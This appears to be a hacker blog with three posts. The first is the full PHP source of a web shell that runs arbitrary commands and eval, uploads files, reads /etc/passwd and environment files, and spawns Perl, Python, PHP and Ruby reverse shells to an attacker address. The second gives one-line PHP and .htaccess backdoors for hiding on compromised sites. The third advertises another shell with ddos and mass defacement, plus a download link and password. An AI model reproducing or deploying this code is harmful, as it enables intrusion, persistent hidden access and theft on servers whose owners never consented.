2013-05-07

HackYard team shell

this is another shell i coded a month ago, it is simple and cool ;)
it is called hackyard shell
<?php
// HackYard priv8 shell made by 0x0(dea) / Alb0zZ Team
// greetz to all the crew members :) n also
// PirateAL, old h4x0rs, malkit.ws, trojanforge
### hackyard.net ###

@error_reporting(E_ERROR | E_PARSE);
// ---
@ini_set("max_execution_time",0);
@set_time_limit(0);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);

if(!empty($_FILES['skedari'])){
    $tmp = $_FILES['skedari']['tmp_name'];
    $emri = $_FILES['skedari']['name'];
    move_uploaded_file($tmp, $emri);
}

function dak($xpp){
if(function_exists("system")){
system($xpp);
}
else{
if(function_exists("passthru")){
passthru($xpp);
}
else{
if(function_exists("exec")){
exec($xpp);
}
else{
if(function_exists("shell_exec")){
shell_exec($xpp);
}
else if(function_exists("popen")){
popen($xpp);
}
else{
echo 'required commands are disabled :/';
}
}
}
}
}

?>
<html>
<head>
<meta name="robots" content="noindex">
<title>HackYard shell priv8 by dea(0x0) | Mini bypasser</title>
<style ="text/css">
body{
border:0;
margin:0;
padding:0;
background:#333;
color:gray;
font-family: times, Times New Roman, times-roman, georgia, serif;
}
a:link, a:visited{
color: white;
font-weight: bold;
text-decoration: none;
padding: 3px;
}
textarea{
width: 100%;
height: 300px;
background: #000;
color: gray;
border-top: 1px solid orange;
outline: none;
margin-left:0;
margin-right:0;
}
#tbig{
width: 300px;
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
input[type="submit"]{
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
select, option, input[type="text"]{
outline: none;
color: gray;
border: 1px solid orange;
outline: none;
background: #000;
}
span{
color: gray;
font-weight: bold;
}
#tsmall{
width: 100px;
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
#t20{
width:40px;
background: #000;
color: gray;
border: 1px solid orange;
outline: none;
}
#main{
width: 500px;
}
</style>
</head>
<body>
<img src="https://hackyard.net/forum/images/styles/DarkCore/style_green/logo.png">
<form action="" method="post">
<a href="?action=home">home</a><a href="?action=eval">eval</a><a href="?action=bind">bind</a><a href="?action=info">info</a> |
<?php
if(isset($_GET['action']) && $_GET['action'] == 'home'){ ?>
 <span>sys&nbsp; » </span> <input type="text" name="exec" id="tbig"> or <select name="execv">
  <option>whoami</option>
  <option>netstat -an</option>
  <option>ls -la</option>
  <option>ls</option>
  <option>uname -a</option>
  <option>dir</option>
  <option>start cmd.exe</option>
  <option>cat /etc/passwd</option>
  <option>cat /etc/hosts</option>
  <option>cat /etc/group/</option>
  <option>cat /etc/motd/</option>
  <option>cat /etc/issue/</option>
  <option>cat /etc/mysql/my.cnf</option>
  <option>cat /proc/self/environ</option>
  <option>cat /proc/environ</option>
  <option>cat /proc/cmdline</option>
</select>
<?php
}
if(isset($_GET['action']) && $_GET['action'] == 'eval'){ ?>
 <span>eval » </span> <input type="text" name="eval" id="tbig"> ex: phpinfo(); or system("ls");
<?php
}
if(isset($_GET['action']) && $_GET['action'] == 'bind'){ ?>
 <span>bind » </span> <input type="text" name="ip" id="tsmall" value="207.0.0.1"> <input type="text" name="port" id="t20" value="1337"><select name="type"><option>perl</option><option>python</option><option>php</option><option>ruby</option></select>nc -v ip port
<?php }
if(empty($_GET['action'])){ ?>
 <span>sys&nbsp; » </span> <input type="text" name="exec" id="tbig">
<?php
}
?><input type="submit" value="GO"></form>
<textarea><?php
if(isset($_POST['exec']) || !empty($_POST['execv']) && empty($_POST['eval']) && empty($_POST['bind'])){
if(empty($_POST['exec'])){
dak($_POST['execv']);
}
else{
dak($_POST['exec']);
}
}
if(isset($_POST['eval'])){
eval(stripslashes($_POST['eval']));
}
if(isset($_POST['ip']) && !empty($_POST['type']) && !empty($_POST['port'])){
$t = $_POST['type'];
$i = $_POST['ip'];
$p = $_POST['port'];

if($t == "perl"){
echo '   done

';
$pl = 'use Socket;$i="'.$i.'";$p='.$p.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
$f = fopen('pwn.pl', 'w');
fputs($f, $pl);
dak("perl pwn.pl");
}
if($t == "python"){
echo '   done

';
$y = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec?t(("'.$i.'",'.$p.'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
$f = fopen('pwn.py', 'w');
fputs($f, $y);
dak("python pwn.py");
}
if($t == "php"){
echo '   done

';
$sock=fsockopen("'.$i.'",'.$p.');exec("/bin/sh -i <&3 >&3 2>&3");
}
if($t == "ruby"){
echo '   done

';
$rb = 'f=TCPSocket.open("'.$i.'",'.$p.').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)';
$f = fopen('pwn.rb', 'w');
fputs($f, $rb);
dak("ruby pwn.rb");
}

}

if(isset($_GET['action']) && $_GET['action'] == "info" && empty($_POST['exec']) && empty($_POST['eval']) && empty($_POST['bind'])){
echo "HackYard shell priv8 by dea(0x0) | Mini bypasser ==> sysinfo:

Server: ".gethostbyname($_SERVER["HTTP_HOST"])."    You: ".$_SERVER['REMOTE_ADDR']."    Php: ".phpversion()."    Apache: ".$_SERVER['SERVER_SOFTWARE']."    OS: ".php_uname()."    USER: ".@get_current_user()."    UID: ".@getmyuid()."    GID: ".@getmygid()."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
";
if(ini_get('safe_mode') == '1'){
echo 'Safe mode: ON
';
}
else{
echo 'Safe mode: OFF
';
}
if(ini_get('magic_quotes_gpc') == '1'){
echo 'Magic_quotes_gpc: ON
';
}
else{
echo 'Magic_quotes_gpc: OFF
';
}
if(function_exists('mysql_connect')){
echo 'Mysql: ON
';
}
else{
echo 'Mysql: OFF
';
}
if(function_exists('mssql_connect')){
echo 'Mssql: ON
';
}
else{
echo 'Mssql: OFF
';
}
if(function_exists('pg_connect')){
echo 'PostgreSQL: ON
';
}
else{
echo 'PostgreSQL: OFF
';
}
if(function_exists('ocilogon')){
echo 'Oracle: ON
';
}
else{
echo 'Oracle: OFF
';
}
if(function_exists('curl_version')){
echo 'Curl: ON
';
}
else{
echo 'Curl: OFF
';
}
if(function_exists('exec')){
echo 'Exec: ON
';
}
else{
echo 'Exec: OFF
';
}
if(!ini_get('open_basedir') != "on"){
echo 'Open_basedir: OFF
';
}
else{
echo 'Open_basedir: ON
';
}
if(!ini_get('ini_restore') != "on"){
echo 'Ini_restore: OFF
';
}
else{
echo 'Ini_restore: ON
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
}
echo 'Disable_functions: ';
if(ini_get('disable_functions') == ''){
echo '  None';
}
else{
echo ini_get('disable_functions');
}
echo "</textarea>";
}
else{
if(!isset($_POST['exec']) && empty($_POST['eval']) && empty($_POST['bind'])){
dak('dir');
}
}
?></textarea><br><br><center>
<?php


if(isset($_POST['turnoff'])){
$off = $_POST['turnoff'];
if($off == "magic_quotes_gpc"){
$handle = fopen(".htaccess", "a+");
$n = '
php_value magic_quotes_gpc off';
fputs($handle, $n);
fclose($handle);
}
else{
$handle = fopen("php.ini", "a+");
$n = '
safe_mode = Off';
fputs($handle, $n);
fclose($handle);
}
}
if(isset($_POST['bypass']) && !empty($_POST['fileb'])){
$b = $_POST['bypass'];
$f = $_POST['fileb'];
if($b == "show_source"){
show_source($f);
}
if($b == "highlight_file"){
highlight_file($f);
}
if($b == "readfile"){
readfile($f);
}
if($b == "symlink"){
fopen("sym.txt", "w");
symlink($f, "sym.txt");
show_source("sym.txt");
}
if($b == "fopen"){
$f = fopen($f, "r");
$h = fread($f, 8192);
echo stripslashes(htmlentities($h));
}
if($b == "include"){
include($f);
}
if($b == "require"){
require($f);
}
if($b == "posix_getpwuid"){
posix_getpwuid($f);
}
}

if(isset($_GET['action']) && $_GET['action'] == "info" && empty($_POST['exec']) && empty($_POST['eval']) && empty($_POST['bind'])){

}
else{
?>
<form enctype="multipart/form-data" method="post">
<b>upload</b><br><input type="file" name="skedari"><input type="submit" value="GO"></form>
<form action="" method="post">
<b>turn off</b><br>
<select name="turnoff">
<option>safe_mode</option>
<option>magic_quotes_gpc</option>
</select><input type="submit" value="GO"></form>
<form action="" method="post">
<b>bypass</b><br>
<select name="bypass">
<option>show_source</option>
<option>highlight_file</option>
<option>readfile</option>
<option>symlink</option>
<option>fopen</option>
<option>include</option>
<option>require</option>
<option>posix_getpwuid</option>
</select> file:<input type="text" name="fileb"><input type="submit" value="GO"></form>
<?php } ?>HackYard shell priv8 by dea(0x0) | Mini bypasser | <a href="http://hackyard.net">HY</a>
</center>
</body>
</html>

2012-12-25

Php & htaccess backdoors

Php backdoor

Sometimes it is needed to backdoor php files on the server to have a way to get it back.
Note! Im not talking about encoding a php file to insert a backdoor on it, this is just a form which allows you to execute system commands.
Im gonna show two ways to do this, using .htaccess and php files itself.

The good of the php method is that it can be inserted at any php file, for example a large forum/cms file where the admin wont be able to find it.

A simple php backdoor:
<?php system($_GET['c']); ?> Go to site.com/filename.php?c=whoami (filename= file name you saved it, whoami= system command)
Gr8, but what if we want our backdoor password protected?
<?php if(isset($_GET['pass']) && $_GET['pass'] == 'yourpass'){ system($_GET['c']);} ?> Now go to site.com/filename.php?pass=yourpass&c=whoami

Htaccess backdoor:
By default viewing .htaccess files on browser is disabled by the server, so firsly we allow viewing of php files:

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
Then we change the type to php executable, meaning that the file will run as php script:
AddType application/x-httpd-php .htaccess And in the end we add the backdoor code:
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?> Full script:
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
This Features are also avaiable in albozz shell, for more you may also want to check weevely, awesome php backdoor.

2012-10-28

Alb0zZ Team Shell ░▒▓█►PRIV8 TILL NOW◄█▓▒░ ~ [Unique Features] [FREE]

By a frend, 0x0
-=-=-=-=-=-=-=-=
Some skids leaked download link so why dont i share myself
Author: 0x0

I would like to give credits to:
DevilzCode (perl symlink script)
Syrian Shell (ddos & zone-h)
x-h4ck (Cloudflare ip finder)
Features
3 login attemps
ready commands
execute command
create file
chmod file
file manager
view file
download
rename
delete
upload (choose dir)
turn off magic_quotes_gpc
encode/decode
(base64/urlencode/md5/sha1/sha512)
bind/backconnect (5)
get exploit and execute
auto symlink (perl)
eval
mass script deface
processes
zone-h
ddos
mysql connect (unique)
tools (mass mail, Cloudflare, Hide Shell, CMS Fack, List Directory, Text 2 Hex, LFI Dude)
phpinfo
logout
kill shell
Screenshots
  Login:
Main window:
File manager:
Htaccess tweaks:
Bind/backconnect:
symlink:
get file(exploit):
tools:
NOTE: There are few encrypted scripts inside the shell, you can decrypt them using encoder tools (not backdoor)
Support download link: http://fileme.us/file/03hrd
Password: yuno
or if you cant download from sharecash
http://adf.ly/DgNoW